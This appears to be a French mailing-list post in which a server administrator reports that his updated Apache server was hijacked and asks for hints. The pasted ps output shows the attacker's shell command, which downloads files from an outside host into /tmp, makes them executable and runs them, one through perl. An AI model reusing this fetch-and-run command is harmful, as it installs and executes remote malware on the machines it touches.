Encore hacké...

Top Page

Reply to this message
Author: Jean-Marc Coursimault
Date:  
To: guilde
Subject: Encore hacké...
Hello folks,

Décidément... Cette fois ci un hacker réussit à faire exécuter un shell à
mon serveur http qui vient d'être mis à jour. Ce shell télécharge un
fichier, le rend exécutable, le fait exécuter par perl.

Heureusement, le programme en question cherche à écouter le port 8118 qui
est bloqué sur ma machine.

Mais comment diable peut-il faire exécuter un shell à mon serveur http ???

Voilà ce que me sort un ps axuwww :
 9022 ?        S      0:00  \_ httpd2 -f /etc/httpd/conf/httpd2.conf
-DAPACHE2 -DHAVE_PHP4 -DHAVE_PYTHON -DHAVE_SUEXEC -DHAVE_ACCESS
-DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_ANON -DHAVE_AUTH_DBM
-DHAVE_AUTH_DIGEST -DHAVE_AUTH -DHAVE_AUTOINDEX
-DHAVE_CASE_FILTER_IN-DHAVE_CASE_FILTER -DHAVE_CERN_META -DHAVE_CGID
-DHAVE_CGI -DHAVE_CHARSET_LITE -DHAVE_DAV_FS -DHAVE_DAV -DHAVE_DEFLATE
-DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ENV -DHAVE_EXPIRES -DHAVE_EXT_FILTER
-DHAVE_HEADERS -DHAVE_IMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG
-DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME_MAGIC -DHAVE_MIME
-DHAVE_NEGOTIATION -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING
-DHAVE_STATUS -DHAVE_UNIQUE_ID -DHAVE_USERDIR -DHAVE_USERTRACK
-DHAVE_VHOST_ALIAS
 9039 ?        S      0:00  |   \_ sh -c cd /tmp;wget
www58.mediaserve.net/.dump/httpd;chmod +x httpd;./httpd;cd /tmp;wget
www58.mediaserve.net/.dump/httpd.txt;chmod +x httpd.txt;perl httpd.txt
 9047 ?        S      0:01  |       \_ perl httpd.txt


Any hints ?
Merci
-- Jean-Marc